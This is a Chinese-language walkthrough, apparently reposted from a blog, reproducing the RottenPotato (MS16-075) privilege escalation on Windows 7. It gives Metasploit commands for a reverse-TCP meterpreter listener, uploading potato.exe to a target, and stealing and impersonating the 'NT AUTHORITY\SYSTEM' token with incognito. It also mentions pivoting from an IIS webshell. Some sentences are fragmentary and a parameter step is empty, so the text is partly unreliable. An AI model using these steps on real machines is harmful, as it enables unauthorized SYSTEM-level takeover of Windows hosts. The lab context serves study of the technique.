“NT AUTHORITY\SYSTEM”账户通过NTLM认证到控制的TCP终端中间人攻击(NTLM重放),为“NT AUTHORITY\SYSTEM”账户本地协商一个安全令牌。这个过程通过一系列的Windows API调用实现的。模仿安全令牌权限”的账户才能去模仿别人的令牌。一般大多数服务型账户(IIS、MSSQL等)都有这个权限,用户级账户大多数没有这个权限。一般从Web拿到的WebShell 都是IIS 服务器权限,是具有这个模仿权限,使用菜刀反弹meterpreter就会成功
烂土豆比热土豆的优点:
通过中间人攻击,将COM(NT\SYSTEM权限)在第二步挑战应答过程中认证的区块改成自己的区块获取SYSTEM令牌,然后利用msf的模仿令牌功能模仿SYSTEM令牌
载入监听模块:use exploit/multi/handler
设置Payload: set payload windows/meterpreter_reverse_tcp
设置参数:
run -j执行监听
查看sessions 刚刚获取的是Sessions 2
可以直接输入sessions 2进入sessions 2 的meterpreter中
这一步直接跳过,msf自带的exp无法提权,所以在Gtihub上下载一个
通过meterpreter上传到目标机器
upload /root/potato.exe c:/ 上传potato.exe到目标机器中的C:/目录下
然后运行之前在令牌提权中的命令:
use incognito
# 加载incoginto功能(用来盗窃目标主机的令牌或是假冒用户)
list_tokens -u
# 列出目标机器用户的可用令牌
execute -cH -f c:/potato.exe
# 创建新的进程
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
参考链接:https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS16-075/potato.exe
烂土豆(RottenPotato)提权 -- Windows7复现
原文:https://www.cnblogs.com/encr/p/15206787.html